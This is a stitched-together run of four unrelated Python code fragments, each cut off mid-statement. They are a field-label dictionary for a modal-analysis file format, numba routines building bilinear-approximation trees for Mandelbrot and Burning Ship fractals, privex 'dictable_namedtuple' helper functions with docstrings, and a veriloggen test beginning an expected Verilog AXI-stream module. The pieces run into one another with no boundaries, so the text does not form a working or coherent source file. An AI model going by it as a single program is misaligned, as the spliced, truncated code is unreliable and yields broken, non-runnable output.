'exp', '15': 'x axis unit exp', 'desc': 'exponent for the length unit on the abscissa', }, 'abscissa_min': { '3': 'min', '15': 'x axis minimum', 'desc': 'abscissa minimum', }, 'abscissa_spacing': { '3': 'spa', '15': 'x axis spacing', 'desc': 'abscissa spacing; 0=uneven, 1=even', }, 'abscissa_spec_data_type': { '3': 'typ', '15': 'x axis type', 'desc': 'abscissa specific data type', }, 'abscissa_temp_unit_exp': { '3': 'exp', '15': 'x axis unit exp', 'desc': 'exponent for the temperature unit on the abscissa', }, 'analysis_id': { '3': 'aid', '15': 'analysis ID', 'desc': 'Analysis ID is used to distinguish between different analyses done in analysis tab.', }, 'analysis_type': { '3': 'typ', '15': 'analysis type', 'desc': 'analysis type number; currently only normal mode (2), complex eigenvalue first order (displacement) (3), frequency response and (5) and complex eigenvalue second order (velocity) (7) are supported', }, 'binary': { '3': 'bin', '15': 'Binary/ASCII', 'desc': '1 for Binary, 0 for ASCII format type', }, 'byte_ordering': { '3': 'byt', '15': 'byte ordering', 'desc': 'byte ordering', }, 'cmif': { '3': 'MIF', '15': 'CMIF', 'desc': 'The Complex Mode Indicator Function', }, 'color': { '3': 'col', '15': 'color', 'desc': 'color number', }, 'cyl_thz': { '3': 'thz', '15': 'x to y', 'desc': 'first Euler rotation', #for cylindrical coordinate system }, 'damp_err': { '3': 'err', '15': 'damp. err.', 'desc': 'Damping error', }, 'data': { '3': 'dat', '15': 'data', 'desc': 'data array', }, 'data_ch': { '3': 'dat', '15': 'data char. nr.', 'desc': 'data-characteristic number', }, 'data_type': { '3': 'typ', '15': 'data type', 'desc': 'data type number; 2 = real data, 5 = complex data', }, 'date_db_created': { '3': 'crt', '15': 'date DB created', 'desc': 'date database created', }, 'date_db_saved': { '3': 'sav', '15': 'date DB saved', 'desc': 'date database saved', }, 'date_file_written': { '3': 'wrt', '15': 'file written', 'desc': 'date file was written', }, 'db_app': { '3': 'nam', '15': 'DB app name', 'desc': 'name of the application that created the database', }, 'def_cs': { '3': 'cs', '15': 'def. cs numbers ', 'desc': 'n deformation cs numbers', }, # what is this? (Blaz) 'description': { '3': 'des', '15': 'description', 'desc': 'description of the model', }, 'disp_cs': { '3': 'cs', '15': 'disp cs numbers', 'desc': 'n displacement cs numbers', }, # what is this? (Blaz) 'eig': { '3': 'eig', '15': 'eigen frequency', 'desc': 'eigen frequency (complex number); applicable to analysis types 3 and 7 only', }, 'eig_real': { '3': 'ere', '15': 'eigen freq [Hz]', 'desc': 'real part of eigen frequency; applicable to analysis types 3 and 7 only', }, 'eig_xi': { '3': 'exi', '15': 'damping factor [/]', 'desc': 'damping factor; applicable to analysis types 3 and 7 only', }, 'element_descriptor': { '3': 'eds', '15': 'element type', 'desc': 'description of element type', }, 'element_id': { '3': 'eid', '15': 'element id', 'desc': 'id number of an element', }, 'file_type': { '3': 'typ', '15': 'file type', 'desc': 'file type string', }, 'force': { '3': 'for', '15': 'force', 'desc': 'force factor', }, 'fp_format': { '3': 'fp', '15': 'fp format', 'desc': 'floating-point format', }, 'freq': { '3': 'fre', '15': 'frequency', 'desc': 'frequency (Hz); applicable to analysis types 2 and 5 only', }, 'freq_err': { '3': 'err', '15': 'freq. err.', 'desc': 'frequency error', }, 'freq_max': { '3': 'max', '15': 'max. freq.', 'desc': 'maximal frequency', }, 'freq_min': { '3': 'min', '15': 'min. freq.', 'desc': 'Minimal frequency', }, 'freq_step_n': { '3': 'stp', '15': 'freq. step nr.', 'desc': 'frequency step number; applicable to analysis type 5 only', }, 'frf': { '3': 'FRF', '15': 'FRF', 'desc': 'Frequency Response Function', }, 'func_type': { '3': 'fun', '15': 'function type', 'desc': 'function type; only 1, 2, 3, 4 and 6 are supported', }, 'id': { '3': 'id', '15': 'id', 'desc': 'id string', }, 'id1': { '3': 'id1', '15': 'id1', 'desc': 'id1 string', }, 'id2': { '3': 'id2', '15': 'id2', 'desc': 'id2 string', }, 'id3': { '3': 'id3', '15': 'id3', 'desc': 'id3 string', }, 'id4': { '3': 'id4', '15': 'id4', 'desc': 'id4 string', }, 'id5': { '3': 'id5', '15': 'id5', 'desc': 'id5 string', }, 'length': { '3': 'len', '15': 'length', 'desc': 'length factor', }, 'lines': { '3': 'lin', '15': 'line numbers', 'desc': 'list of n line numbers', }, 'load_case': { '3': 'loa', '15': 'load case', 'desc': 'load case number', }, 'load_case_id': { '3': 'loa', '15': 'load case id', 'desc': 'id number for the load case', }, 'max_order': { '3': 'max', '15': 'max. order', 'desc': 'maximum model order', }, 'modal_a': { '3': 'mod', '15': 'modal a', 'desc': 'modal-a (complex number); applicable to analysis types 3 and 7 only', }, 'modal_b': { '3': 'mod', '15': 'modal b', 'desc': 'modal-b (complex number); applicable to analysis types 3 and 7 only', }, 'modal_damp_his': { '3': 'dmp', '15': 'modal damp. his', 'desc': 'modal hysteretic damping ratio; applicable to analysis type 2 only', }, 'modal_damp_vis': { '3': 'dmp', '15': 'modal damp vis', 'desc': 'modal viscous damping ratio; applicable to analysis type 2 only', }, 'modal_m': { '3': 'mod', '15': 'modal mass', 'desc': 'modal mass; applicable to analysis type 2 only', }, 'mode_n': { '3': 'mod', '15': 'mode number', 'desc': 'mode number; applicable to analysis types 2, 3 and 7 only', }, 'model_id': { '3': 'mid', '15': 'model ID', 'desc': 'id number of the model', }, 'model_name': { '3': 'mod', '15': 'model name', 'desc': 'the name of the model', }, 'model_type': { '3': 'mod', '15': 'model type', 'desc': 'model type number', }, 'n_ascii_lines': { '3': 'nr', '15': 'ascii lines nr', 'desc': 'number of ascii lines', }, 'n_bytes': { '3': 'nr', '15': 'nr of bytes', 'desc': 'number of bytes', }, 'n_data_per_node': { '3': 'nr', '15': 'nr of data', 'desc': 'number of data per node (DOFs)', }, 'n_nodes': { '3': 'nr', '15': 'nr of nodes', 'desc': 'number of nodes', }, 'nr_of_nodes': { '3': 'nrn', '15': 'node count', 'desc': 'number of nodes per element', }, 'node_nums': { '3': 'nr', '15': 'node nums', 'desc': 'node numbers', }, 'num_pts': { '3': 'pts', '15': 'nr of pts', 'desc': 'number of data pairs for uneven abscissa or number of data values for even abscissa', }, 'ord_data_type': { '3': 'typ', '15': 'ord data type', 'desc': 'ordinate data type', }, 'orddenom_axis_units_lab': { '3': 'y', '15': 'y axis units', 'desc': 'label for the units on the ordinate denominator', }, 'orddenom_force_unit_exp': { '3': 'exp', '15': 'unit exponent', 'desc': 'exponent for the force unit on the ordinate denominator', }, 'orddenom_len_unit_exp': { '3': 'exp', '15': 'y axis unit exp', 'desc': 'exponent for the length unit on the ordinate denominator', }, 'orddenom_spec_data_type': { '3': 'typ', '15': 'y axis type', 'desc': 'ordinate denominator specific data type', }, 'orddenom_temp_unit_exp': { '3': 'exp', '15': 'y axis unit exp', 'desc': 'exponent for the temperature unit on the ordinate denominator', }, 'ordinate_axis_units_lab': { '3': 'y', '15':
= np.zeros((2 * ref_orbit_len,), dtype=numba.float64) M_bla_new, r_bla_new, bla_len, stages = init_BLA_BS( M_bla, r_bla, Zn_path, dfxdx, dfxdy, dfydx, dfydy, kc_std, eps ) return M_bla_new, r_bla_new, bla_len, stages @numba.njit def init_BLA(M_bla, r_bla, Zn_path, dfdz, kc_std, eps): """ Initialize BLA tree at stg 0 """ ref_orbit_len = Zn_path.shape[0] # at order + 1, we wrap for i in range(ref_orbit_len): i_0 = 2 * i # BLA index for (i, 0) # Define a BLA_step by: # [ M[0] 0 0] # M = [ 0 M[0] M[1]] # [ 0 0 1] # # [dzndc] # Zn = [ zn] # [ c] # # Z_(n+1) = M * Zn Zn_i = Zn_path[i] M_bla[i_0, 0] = dfdz(Zn_i) M_bla[i_0, 1] = 1. # We use the following criteria : # |Z + z| shall stay *far* from O or discontinuity of F', for each c # For std Mandelbrot it means from z = 0 # |zn| << |Zn| # For Burning ship x = 0 or y = 0 # |zn| << |Xn|, |zn| << |Yn| # We could additionnally consider a criterian based on hessian # |z| < A e / h where h Hessian - not useful (redundant) # for Mandelbrot & al. mZ = np.abs(Zn_path[i]) ii = (i + 1) % ref_orbit_len mZZ = np.abs(Zn_path[ii]) # mA = np.abs(M_bla[i_0, 0]) r_bla[i_0] = max( 0., min( # error term is negligible mZ * eps, # Avoid dyn glitch at next step mZZ * eps # ((0.5 * mZZ) - kc_std) / (1. + mA) ) ) # Now the combine step # number of needed "stages" (ref_orbit_len).bit_length() stages = _stages_bla(ref_orbit_len) for stg in range(1, stages): combine_BLA(M_bla, r_bla, kc_std, stg, ref_orbit_len, eps) M_bla_new, r_bla_new, bla_len = compress_BLA(M_bla, r_bla, stages) return M_bla_new, r_bla_new, bla_len, stages @numba.njit def init_BLA_BS(M_bla, r_bla, Zn_path, dfxdx, dfxdy, dfydx, dfydy, kc_std, eps): """ Initialize BLA tree at stg 0 """ ref_orbit_len = Zn_path.shape[0] # at order + 1, we wrap for i in range(ref_orbit_len): i_0 = 2 * i # BLA index for (i, 0) # Define a BLA_step by: # Z_(n+1) = M * Zn where # [dxnda] # [dxndb] # [dynda] [ M_0 0 0] # Zn = [dyndb] M = [ 0 M_1 M_2] # [ xn] [ 0 0 I] # [ yn] # [ a] # [ b] # [M[0] 0 M[1] 0 ] # M_0 = [0 M[0] 0 M[1]] # [M[2] 0 M[3] 0 ] # [0 M[2] 0 M[3]] # # M_1 = [M[0] M[1]] M_1_init = [dfxdx dfxdy] # [M[2] M[3]] [dfydx dfydy] # # M_2 = [M[4] M[5]] M_2_init = [1 0] # [M[6] M[7]] [0 -1] # Zn_i = Zn_path[i] Xn_i = Zn_i.real Yn_i = Zn_i.imag M_bla[i_0, 0] = dfxdx(Xn_i, Yn_i) M_bla[i_0, 1] = dfxdy(Xn_i, Yn_i) M_bla[i_0, 2] = dfydx(Xn_i, Yn_i) M_bla[i_0, 3] = dfydy(Xn_i, Yn_i) M_bla[i_0, 4] = 1. M_bla[i_0, 5] = 0. M_bla[i_0, 6] = 0. M_bla[i_0, 7] = -1. mZ = min(abs(Xn_i), abs(Yn_i)) # ii = (i + 1) % ref_orbit_len r_bla[i_0] = mZ * eps # Now the combine step # number of needed "stages" i.e. (ref_orbit_len).bit_length() stages = _stages_bla(ref_orbit_len) for stg in range(1, stages): combine_BLA_BS(M_bla, r_bla, kc_std, stg, ref_orbit_len, eps) M_bla_new, r_bla_new, bla_len = compress_BLA(M_bla, r_bla, stages) return M_bla_new, r_bla_new, bla_len, stages @numba.njit def _stages_bla(ref_orbit_len): """ number of needed "stages" (ref_orbit_len).bit_length() """ return int(np.ceil(np.log2(ref_orbit_len))) @numba.njit def combine_BLA(M, r, kc_std, stg, ref_orbit_len, eps): """ Populate successive stages of a BLA tree A_bla, B_bla, r_bla : data of the BLA tree kc : majorant of |c| stg : stage of the tree that is populated by merging (stg - 1) items ref_orbit_len : the len for the reference orbit """ # Combine all BVA at stage stg-1 to make stage stg with stg > 0 step = (1 << stg) for i in range(0, ref_orbit_len - step, step): ii = i + (step // 2) # If ref_orbit_len is not a power of 2, we might get outside the array if ii >= ref_orbit_len: break index1 = BLA_index(i, stg - 1) index2 = BLA_index(ii, stg - 1) index_res = BLA_index(i, stg) # Combines linear approximations # M_res = [ M2[0] M2[1]] * [ M1[0] M1[1]] # [ 0 1] [ 0 1] M[index_res, 0] = M[index2, 0] * M[index1, 0] M[index_res, 1] = M[index2, 0] * M[index1, 1] + M[index2, 1] # Combines the validity radii r1 = r[index1] r2 = r[index2] # r1 is a direct criteria however for r2 we need to go 'backw the flow' # z0 -> z1 -> z2 with z1 = A1 z0 + B1 c, |z1| < r2 mA1 = np.abs(M[index1, 0]) mB1 = np.abs(M[index1, 1]) r2_backw = max(0., (r2 - mB1 * kc_std) / (mA1 + 1.)) # might use eps ? r[index_res] = min(r1, r2_backw) @numba.njit def combine_BLA_BS(M, r, kc_std, stg, ref_orbit_len, eps): """ Populate successive stages of a BLA tree A_bla, B_bla, r_bla : data of the BLA tree kc : majorant of |c| stg : stage of the tree that is populated by merging (stg - 1) items ref_orbit_len : the len for the reference orbit """ # Combine all BVA at stage stg-1 to make stage stg with stg > 0 step = (1 << stg) for i in range(0, ref_orbit_len - step, step): ii = i + (step // 2) # If ref_orbit_len is not a power of 2, we might get outside the array if ii >= ref_orbit_len: break index1 = BLA_index(i, stg - 1) index2 = BLA_index(ii, stg - 1) index_res = BLA_index(i, stg) # Combines linear approximations # M = [M2_1 M2_2] x [M1_1 M1_2] # [ 0 I] [ 0 I] # Mx_1 = [M[0] M[1]] Mx_2 = [M[4] M[5]] # [M[2] M[3]] [M[6] M[7]] # Mres_1 = M2_1 * M1_1 # Mres_2 = M2_1 * M1_1 + M2_2 # Mres_1 = M2_1 * M1_1 : M[index_res, 0] = ( M[index2, 0] * M[index1, 0] + M[index2, 1] * M[index1, 2] ) M[index_res, 1] = ( M[index2, 0] * M[index1, 1] + M[index2, 1] * M[index1, 3] ) M[index_res, 2] = ( M[index2, 2] * M[index1, 0] + M[index2, 3] * M[index1, 2] ) M[index_res, 3] = ( M[index2, 2] * M[index1, 1] + M[index2, 3] * M[index1, 3] ) # Mres_2 = M2_1 * M1_1 + M2_2 M[index_res, 4] = ( M[index2, 0] * M[index1, 4] + M[index2, 1] * M[index1, 6] + M[index2, 4] ) M[index_res, 5] = ( M[index2, 0] * M[index1, 5] + M[index2, 1] * M[index1, 7] + M[index2, 5] ) M[index_res, 6] = ( M[index2, 2] * M[index1, 4] + M[index2, 3] * M[index1, 6] + M[index2, 6] ) M[index_res, 7] = ( M[index2, 2] * M[index1, 5] + M[index2, 3] * M[index1, 7] + M[index2, 7] ) # Combines the validity radii r1 = r[index1] r2 = r[index2] # r1 is a direct criteria however for r2 we need to go 'backw the flow' # z0 -> z1 -> z2 with z1 = A1 z0 + B1 c, |z1| < r2 mA1 = max( np.abs(M[index1, 0]), np.abs(M[index1, 1]), np.abs(M[index1, 2]), np.abs(M[index1, 3]), ) mB1 = max( np.abs(M[index1, 4]), np.abs(M[index1, 5]), np.abs(M[index1, 6]), np.abs(M[index1, 7]), ) r2_backw = max(0., (r2 - mB1 * kc_std) / (mA1 + 1.)) # might use eps ? r[index_res] = min(r1, r2_backw) @numba.njit def compress_BLA(M_bla, r_bla, stages): """ We build 'compressed' arrays which only feature multiples of 2 ** STG_COMPRESSED """ k_comp = 1 << STG_COMPRESSED ref_orbit_len = M_bla.shape[0] // 2 new_len = M_bla.shape[0] // k_comp bla_dim = M_bla.shape[1] M_bla_new = np.zeros((new_len * bla_dim,), dtype=M_bla.dtype) r_bla_new = np.zeros((new_len,), dtype=numba.float64) for stg in range(STG_COMPRESSED, stages): step = (1 << stg) for i in range(0, ref_orbit_len - step, step): index = BLA_index(i, stg) new_index = BLA_index(i // k_comp,
if not all(type(n) == str for n in f): return False return True def convert_dictable_namedtuple(nt_instance, typename=None, module=None, **kwargs) -> Union[NamedTuple, Dict]: """ Convert an existing :func:`collections.namedtuple` instance into a dictable_namedtuple instance. **Example** First we create a namedtuple type ``Person`` >>> from collections import namedtuple >>> Person = namedtuple('Person', 'first_name last_name') Next we create an instance of ``Person`` called <NAME>, and we can confirm it's a normal namedtuple, as we can't access first_name by item/key. >>> john = Person('John', 'Doe') >>> john['first_name'] TypeError: tuple indices must be integers or slices, not str Using :func:`.convert_dictable_namedtuple`, we can convert ``john`` from a normal ``namedtuple``, into a ``dictable_namedtuple``. This enables many convenience features (see :func:`.dictable_namedtuple` for more info) such as easy casting to a :class:`dict`, and accessing fields by item/key (square brackets):: >>> from privex.helpers import convert_dictable_namedtuple >>> d_john = convert_dictable_namedtuple(john) >>> d_john Person(first_name='John', last_name='Doe') >>> d_john['first_name'] 'John' >>> dict(d_john) {'first_name': 'John', 'last_name': 'Doe'} :param nt_instance: An instantiated namedtuple object (using a type returned from :func:`collections.namedtuple`) :param str typename: Optionally, you can change the name of your instance's class, e.g. if you provide a ``Person`` instance, but you set this to ``Man``, then this will return a ``Man`` instance, like so: ``Man(first_name='John', last_name='Doe')`` :param str module: Optionally, you can change the module that the type class belongs to. Otherwise it will inherit the module path from the class of your instance. :key bool read_only: (Default: ``False``) If set to ``True``, the outputted dictable_namedtuple instance will not allow new fields to be created via attribute / item setting. :return dictable_namedtuple: The instance you passed ``nt_instance``, converted into a dictable_namedtuple """ nt_class = nt_instance.__class__ module = nt_class.__module__ if module is None else module dnt_class = subclass_dictable_namedtuple(nt_class, typename=typename, module=module, **kwargs) return dnt_class(**nt_instance._asdict()) def subclass_dictable_namedtuple(named_type: type, typename=None, module=None, **kwargs) -> type: """ Convert an existing :func:`collections.namedtuple` **type** into a dictable_namedtuple. If you have an INSTANCE of a type (e.g. it has data attached), use :func:`.convert_dictable_namedtuple` **Example**:: >>> from collections import namedtuple >>> from privex.helpers import subclass_dictable_namedtuple >>> # Create a namedtuple type called 'Person' >>> orig_Person = namedtuple('Person', 'first_name last_name') >>> # Convert the 'Person' type into a dictable_namedtuple >>> Person = subclass_dictable_namedtuple(orig_Person) >>> john = Person('John', 'Doe') # Create an instance of this dictable_namedtuple Person >>> john['middle_name'] = 'Davis' :param type named_type: A NamedTuple type returned from :func:`collections.namedtuple` :param str typename: Optionally, you can change the name of your type, e.g. if you provide a ``Person`` class type, but you set this to ``Man``, then this will return a ``Man`` class type. :param str module: Optionally, you can change the module that the type class belongs to. Otherwise it will inherit the module path from ``named_type``. :key bool read_only: (Default: ``False``) If set to ``True``, the outputted dictable_namedtuple type will not allow new fields to be created via attribute / item setting. :return type dictable_namedtuple: Your ``named_type`` converted into a dictable_namedtuple type class. """ typename = named_type.__name__ if typename is None else typename module = named_type.__module__ if module is None else module read_only = kwargs.pop('read_only', False) _dt = make_dict_tuple(typename, ' '.join(named_type._fields), read_only=read_only) if module is None: try: module = sys._getframe(1).f_globals.get('__name__', '__main__') except (AttributeError, ValueError): pass if module is not None: _dt.__module__ = module return _dt def make_dict_tuple(typename, field_names, *args, **kwargs): """ Generates a :func:`collections.namedtuple` type, with added / modified methods injected to make it into a ``dictable_namedtuple``. Note: You probably want to be using :func:`.dictable_namedtuple` instead of calling this directly. """ read_only = kwargs.pop('read_only', False) module = kwargs.pop('module', None) # Create a namedtuple type to use as a base BaseNT = namedtuple(typename, field_names, **kwargs) def __init__(self, *args, **kwargs): self.__dict__['_extra_items'] = dict() for i, a in enumerate(list(args)): self.__dict__[self._fields[i]] = a for k, a in kwargs.items(): self.__dict__[k] = a def __iter__(self): """This ``__iter__`` method allows for casting a dictable_namedtuple instance using ``dict(my_nt)``""" for k in self._fields: yield (k, getattr(self, k),) def __getitem__(self, item): """Handles when a dictable_namedtuple instance is accessed like ``my_nt['abc']`` or ``my_nt[0]``""" if type(item) is int: return self.__dict__[self._fields[item]] return getattr(self, item) def __getattr__(self, item): """Handles when a dictable_namedtuple instance is accessed like ``my_nt.abcd``""" try: _v = object.__getattribute__(self, '_extra_items') return _v[item] except (KeyError, AttributeError): return object.__getattribute__(self, item) def __setitem__(self, key, value): """Handles when a dictable_namedtuple instance is accessed like ``my_nt['abc'] = 'def'``""" if hasattr(self, key): return tuple.__setattr__(self, key, value) if self._READ_ONLY: raise KeyError(f"{self.__class__.__name__} is read only. You cannot set a non-existent field.") self._extra_items[key] = value if key not in self._fields: tuple.__setattr__(self, '_fields', self._fields + (key,)) def __setattr__(self, key, value): """Handles when a dictable_namedtuple instance is accessed like ``my_nt.abcd = 'def'``""" if key in ['_extra_items', '_fields'] or key in self._fields: return tuple.__setattr__(self, key, value) if self._READ_ONLY: raise AttributeError(f"{self.__class__.__name__} is read only. You cannot set a non-existent field.") self._extra_items[key] = value if key not in self._fields: tuple.__setattr__(self, '_fields', self._fields + (key,)) def _asdict(self): """ The original namedtuple ``_asdict`` doesn't work with our :meth:`.__iter__`, so we override it for compatibility. Simply calls ``return dict(self)`` to convert the instance to a dict. """ return dict(self) def __repr__(self): _n = ', '.join(f"{name}='{getattr(self, name)}'" for name in self._fields) return f"{self.__class__.__name__}({_n})" # Inject our methods defined above into the namedtuple type BaseNT BaseNT.__getattr__ = __getattr__ BaseNT.__getitem__ = __getitem__ BaseNT.__setitem__ = __setitem__ BaseNT.__setattr__ = __setattr__ BaseNT._asdict = _asdict BaseNT.__repr__ = __repr__ BaseNT.__iter__ = __iter__ BaseNT.__init__ = __init__ BaseNT._READ_ONLY = read_only # Create a class for BaseNT with tuple + object mixins, allowing things like __dict__ to function properly # and allowing for tuple.__setattr__ / object.__getattribute__ calls. class K(BaseNT, tuple, object): pass # Get the calling module so we can overwrite the module name of the class. if module is None: try: module = sys._getframe(1).f_globals.get('__name__', '__main__') except (AttributeError, ValueError): pass # Overwrite the type name + module to match the originally requested typename K.__name__ = BaseNT.__name__ K.__qualname__ = BaseNT.__qualname__ K.__module__ = module return K def dictable_namedtuple(typename, field_names, *args, **kwargs) -> Union[Type[namedtuple], dict]: """ Creates a dictable_namedtuple type for instantiation (same usage as :func:`collections.namedtuple`) - unlike namedtuple, dictable_namedtuple instances allow item (dict-like) field access, support writing and can be painlessly converted into dictionaries via ``dict(my_namedtuple)``. Named tuple instances created from ``dictable_namedtuple`` types are generally backwards compatible with any code that expects a standard :func:`collections.namedtuple` type instance. **Quickstart** >>> from privex.helpers import dictable_namedtuple >>> # Define a dictable_namedtuple type of 'Person', which has two fields - first_name and last_name >>> p = dictable_namedtuple('Person', 'first_name last_name') >>> john = p('John', 'Doe') # Alternatively you can do p(first_name='John', last_name='Doe') >>> john.first_name # You can retrieve keys either via attributes (dot notation) 'John' >>> john['last_name'] # Via named keys (square brackets) 'Doe' >>> john[1] # Or, via indexed keys (square brackets, with integer keys) 'Doe' >>> john.middle_name = 'Davis' # You can also update / set new keys via attribute/key/index >>> dict(john) # Newly created keys will show up as normal in dict(your_object) {'first_name': 'John', 'last_name': 'Doe', 'middle_name': 'Davis'} >>> john # As well as in the representation in the REPL or when str() is called. Person(first_name='John', last_name='Doe', middle_name='Davis') This function adds / overrides the following methods on the generated namedtuple type: * _asdict * __iter__ * __getitem__ * __getattribute__ * __setitem__ * __setattr__ * __repr__ Extra functionality compared to the standard :func:`.namedtuple` generated classes: * Can access fields via item/key: ``john['first_name']`` * Can convert instance into a dict simply by casting: ``dict(john)`` * Can set new items/attributes on an instance, even if they weren't previously defined. ``john['middle_name'] = 'Davis'`` or ``john.middle_name = 'Davis'`` **Example Usage** First we'll create a named tuple typle called ``Person``, which takes two arguments, first_name and last_name. >>> from privex.helpers import dictable_namedtuple >>> Person = dictable_namedtuple('Person', 'first_name last_name') Now we'll create an instance of ``Person`` called ``john``. These instances look like normal ``namedtuple``'s, and should be generally compatible with any functions/methods which deal with named tuple's. >>>
from __future__ import absolute_import from __future__ import print_function import os import veriloggen import axi_stream expected_verilog = """ module blinkled ( input CLK, input RST, input [32-1:0] axi_a_tdata, input axi_a_tvalid, output axi_a_tready, input axi_a_tlast, output reg [32-1:0] axi_b_tdata, output reg axi_b_tvalid, input axi_b_tready, output reg axi_b_tlast, input [32-1:0] saxi_awaddr, input [4-1:0] saxi_awcache, input [3-1:0] saxi_awprot, input saxi_awvalid, output saxi_awready, input [32-1:0] saxi_wdata, input [4-1:0] saxi_wstrb, input saxi_wvalid, output saxi_wready, output [2-1:0] saxi_bresp, output reg saxi_bvalid, input saxi_bready, input [32-1:0] saxi_araddr, input [4-1:0] saxi_arcache, input [3-1:0] saxi_arprot, input saxi_arvalid, output saxi_arready, output reg [32-1:0] saxi_rdata, output [2-1:0] saxi_rresp, output reg saxi_rvalid, input saxi_rready ); wire _axi_a_read_req_fifo_enq; wire [105-1:0] _axi_a_read_req_fifo_wdata; wire _axi_a_read_req_fifo_full; wire _axi_a_read_req_fifo_almost_full; wire _axi_a_read_req_fifo_deq; wire [105-1:0] _axi_a_read_req_fifo_rdata; wire _axi_a_read_req_fifo_empty; wire _axi_a_read_req_fifo_almost_empty; assign _axi_a_read_req_fifo_enq = 0; assign _axi_a_read_req_fifo_wdata = 'hx; assign _axi_a_read_req_fifo_deq = 0; _axi_a_read_req_fifo inst__axi_a_read_req_fifo ( .CLK(CLK), .RST(RST), ._axi_a_read_req_fifo_enq(_axi_a_read_req_fifo_enq), ._axi_a_read_req_fifo_wdata(_axi_a_read_req_fifo_wdata), ._axi_a_read_req_fifo_full(_axi_a_read_req_fifo_full), ._axi_a_read_req_fifo_almost_full(_axi_a_read_req_fifo_almost_full), ._axi_a_read_req_fifo_deq(_axi_a_read_req_fifo_deq), ._axi_a_read_req_fifo_rdata(_axi_a_read_req_fifo_rdata), ._axi_a_read_req_fifo_empty(_axi_a_read_req_fifo_empty), ._axi_a_read_req_fifo_almost_empty(_axi_a_read_req_fifo_almost_empty) ); reg [4-1:0] count__axi_a_read_req_fifo; wire [8-1:0] _axi_a_read_op_sel_fifo; wire [32-1:0] _axi_a_read_local_addr_fifo; wire [32-1:0] _axi_a_read_local_stride_fifo; wire [33-1:0] _axi_a_read_local_size_fifo; wire [8-1:0] unpack_read_req_op_sel_0; wire [32-1:0] unpack_read_req_local_addr_1; wire [32-1:0] unpack_read_req_local_stride_2; wire [33-1:0] unpack_read_req_local_size_3; assign unpack_read_req_op_sel_0 = _axi_a_read_req_fifo_rdata[104:97]; assign unpack_read_req_local_addr_1 = _axi_a_read_req_fifo_rdata[96:65]; assign unpack_read_req_local_stride_2 = _axi_a_read_req_fifo_rdata[64:33]; assign unpack_read_req_local_size_3 = _axi_a_read_req_fifo_rdata[32:0]; assign _axi_a_read_op_sel_fifo = unpack_read_req_op_sel_0; assign _axi_a_read_local_addr_fifo = unpack_read_req_local_addr_1; assign _axi_a_read_local_stride_fifo = unpack_read_req_local_stride_2; assign _axi_a_read_local_size_fifo = unpack_read_req_local_size_3; reg [8-1:0] _axi_a_read_op_sel_buf; reg [32-1:0] _axi_a_read_local_addr_buf; reg [32-1:0] _axi_a_read_local_stride_buf; reg [33-1:0] _axi_a_read_local_size_buf; reg _axi_a_read_data_idle; wire _axi_a_read_idle; assign _axi_a_read_idle = _axi_a_read_req_fifo_empty && _axi_a_read_data_idle; wire _axi_b_write_req_fifo_enq; wire [105-1:0] _axi_b_write_req_fifo_wdata; wire _axi_b_write_req_fifo_full; wire _axi_b_write_req_fifo_almost_full; wire _axi_b_write_req_fifo_deq; wire [105-1:0] _axi_b_write_req_fifo_rdata; wire _axi_b_write_req_fifo_empty; wire _axi_b_write_req_fifo_almost_empty; assign _axi_b_write_req_fifo_enq = 0; assign _axi_b_write_req_fifo_wdata = 'hx; assign _axi_b_write_req_fifo_deq = 0; _axi_b_write_req_fifo inst__axi_b_write_req_fifo ( .CLK(CLK), .RST(RST), ._axi_b_write_req_fifo_enq(_axi_b_write_req_fifo_enq), ._axi_b_write_req_fifo_wdata(_axi_b_write_req_fifo_wdata), ._axi_b_write_req_fifo_full(_axi_b_write_req_fifo_full), ._axi_b_write_req_fifo_almost_full(_axi_b_write_req_fifo_almost_full), ._axi_b_write_req_fifo_deq(_axi_b_write_req_fifo_deq), ._axi_b_write_req_fifo_rdata(_axi_b_write_req_fifo_rdata), ._axi_b_write_req_fifo_empty(_axi_b_write_req_fifo_empty), ._axi_b_write_req_fifo_almost_empty(_axi_b_write_req_fifo_almost_empty) ); reg [4-1:0] count__axi_b_write_req_fifo; wire [8-1:0] _axi_b_write_op_sel_fifo; wire [32-1:0] _axi_b_write_local_addr_fifo; wire [32-1:0] _axi_b_write_local_stride_fifo; wire [33-1:0] _axi_b_write_size_fifo; wire [8-1:0] unpack_write_req_op_sel_4; wire [32-1:0] unpack_write_req_local_addr_5; wire [32-1:0] unpack_write_req_local_stride_6; wire [33-1:0] unpack_write_req_local_size_7; assign unpack_write_req_op_sel_4 = _axi_b_write_req_fifo_rdata[104:97]; assign unpack_write_req_local_addr_5 = _axi_b_write_req_fifo_rdata[96:65]; assign unpack_write_req_local_stride_6 = _axi_b_write_req_fifo_rdata[64:33]; assign unpack_write_req_local_size_7 = _axi_b_write_req_fifo_rdata[32:0]; assign _axi_b_write_op_sel_fifo = unpack_write_req_op_sel_4; assign _axi_b_write_local_addr_fifo = unpack_write_req_local_addr_5; assign _axi_b_write_local_stride_fifo = unpack_write_req_local_stride_6; assign _axi_b_write_size_fifo = unpack_write_req_local_size_7; reg [8-1:0] _axi_b_write_op_sel_buf; reg [32-1:0] _axi_b_write_local_addr_buf; reg [32-1:0] _axi_b_write_local_stride_buf; reg [33-1:0] _axi_b_write_size_buf; reg _axi_b_write_data_idle; wire _axi_b_write_idle; assign _axi_b_write_idle = _axi_b_write_req_fifo_empty && _axi_b_write_data_idle; assign saxi_bresp = 0; assign saxi_rresp = 0; reg signed [32-1:0] _saxi_register_0; reg signed [32-1:0] _saxi_register_1; reg signed [32-1:0] _saxi_register_2; reg signed [32-1:0] _saxi_register_3; reg _saxi_flag_0; reg _saxi_flag_1; reg _saxi_flag_2; reg _saxi_flag_3; reg signed [32-1:0] _saxi_resetval_0; reg signed [32-1:0] _saxi_resetval_1; reg signed [32-1:0] _saxi_resetval_2; reg signed [32-1:0] _saxi_resetval_3; localparam _saxi_maskwidth = 2; localparam _saxi_mask = { _saxi_maskwidth{ 1'd1 } }; localparam _saxi_shift = 2; reg [32-1:0] _saxi_register_fsm; localparam _saxi_register_fsm_init = 0; reg [32-1:0] addr_8; reg writevalid_9; reg readvalid_10; reg prev_awvalid_11; reg prev_arvalid_12; assign saxi_awready = (_saxi_register_fsm == 0) && (!writevalid_9 && !readvalid_10 && !saxi_bvalid && prev_awvalid_11); assign saxi_arready = (_saxi_register_fsm == 0) && (!readvalid_10 && !writevalid_9 && prev_arvalid_12 && !prev_awvalid_11); reg [_saxi_maskwidth-1:0] axis_maskaddr_13; wire signed [32-1:0] axislite_rdata_14; assign axislite_rdata_14 = (axis_maskaddr_13 == 0)? _saxi_register_0 : (axis_maskaddr_13 == 1)? _saxi_register_1 : (axis_maskaddr_13 == 